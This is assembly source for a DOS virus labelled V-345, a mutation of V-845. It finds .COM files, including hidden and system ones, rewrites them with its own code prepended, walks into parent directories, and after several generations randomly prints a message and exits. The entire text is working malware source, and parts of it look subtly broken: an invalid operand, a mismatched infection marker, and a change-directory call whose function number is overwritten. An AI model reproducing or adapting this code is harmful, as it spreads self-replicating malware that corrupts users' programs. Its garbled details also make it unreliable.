; COMPILED WITH TASM 2.0
; page ,132
; name V345
; title V-345 - a mutation of the V-845 virus
.model tiny
.radix 16
code segment
assume cs:code,ds:code
org 100
start:
k db 2C dup ( '10')
jmp short virus
ident dw 'IH'
newdta db 2C dup (?)
virus:
jc cd
xor ident, [1110+11h]
;xor virlen, [1010+1h]
push ax
mov ax,cs ;Move program code
add ax,1000 ; 64K bytes forward
mov es,ax
inc [counter]
mov si,offset start
xor di,di
mov cx,virlen
rep movsb
mov dx,offset newdta ;Set new Disk Transfer Address
mov ah,1A ;Set DTA
int 21
mov dx, offset allcom ;Search for '*.COM' files
mov cx,110b ;Normal, Hidden or System
mov ah,4E ;Find First file
int 21
jc done ;Quit if none found
mainlp:
mov dx,fname
mov ax,3D02 ;Open file in Read/Write mode
int 21
mov bx,ax ; Save handle
push es
pop ds
mov dx,virlen
mov cx,0FFFF ;Read all bytes (64K max in .COM file)
mov ah,3F ;Read from handle
int 21 ;Bytes read in AX
add ax,virlen
mov cs:[eof],ax ;Save pointer to the end of file
cmp ds:[newid+virlen],'VI' ;Infected?
je close ;Go find next file if so
xor cx,cx ;Go to file beginning
mov dx,cx
mov ax,4200 ;LSEEK from the beginning of the file
int 21
jc close ;Leave this file if error occures
; xor ident, [1010+10h]
xor dx,dx ;Write the whole code (virus+file)
mov cx,cs:[eof] ; back onto the file
mov ah,40 ;Write to handle
int 21
close:
mov ah,3E ;Close the file
int 21
push cs
pop ds ;Restore DS
mov ah,4F ;Find next matching file
int 21
jc done
jc cd ;CD
;jmp mainlp ;Otherwise loop again
cd:
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
mov ah, 47h
; mov ptr [bp+allcom], '*.'
int 21
jmp mainlp
jc done ;Quit if none found
done:
int 21
cmp [counter],5 ;If counter goes above 5,
jb progok ; the program becomes "sick"
mov ax,40
mov ds,ax ;Get the system timer value
mov ax,word ptr [timer]
push cs
pop ds ;Restore DS
and ax,1 ;At random (if timer value is odd)
jz progok ; display the funny message
mov dx,offset message
mov ah,9 ;Print string
int 21
mov ah, 4ch
int 21
message db 'Microsoft DOS Application'
progok:
mov si,offset transf ;Move this part of code
mov cx,offset endcode - offset transf ;Code length
xor di,di ;Move to ES:0
rep movsb ;Do it
pop bx ; BX = old AX
mov word ptr cs:[progbeg],0
mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
jmp cs:[progbeg] ;Jump at program start
transf:
push ds
pop es
mov si,offset endcode
mov di,offset start
mov cx,0FFFF ;Restore original program's code
sub cx,si
rep movsb
mov word ptr cs:[start],offset start
mov word ptr cs:[start+2],ds
mov ax,bx
jmp dword ptr cs:[start] ;Jump to program start
endcode label byte
int 20 ;Dummy program
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
fake_msg db "$"
Row dw 24
origdir db 64 dup (?) ; Current directory buffer
numinfec db ? ; Infections this run
allcom db '*.COM'
buffer db 1ah dup (?) ; read buffer
fname equ offset newdta+1E
dot_dot db '..'
timer equ 6C
olddta equ 80
virlen = offset endcode - offset start
newid = offset ident - offset start
counter db 0
progbeg dd ?
eof dw ?
code ends
end start
�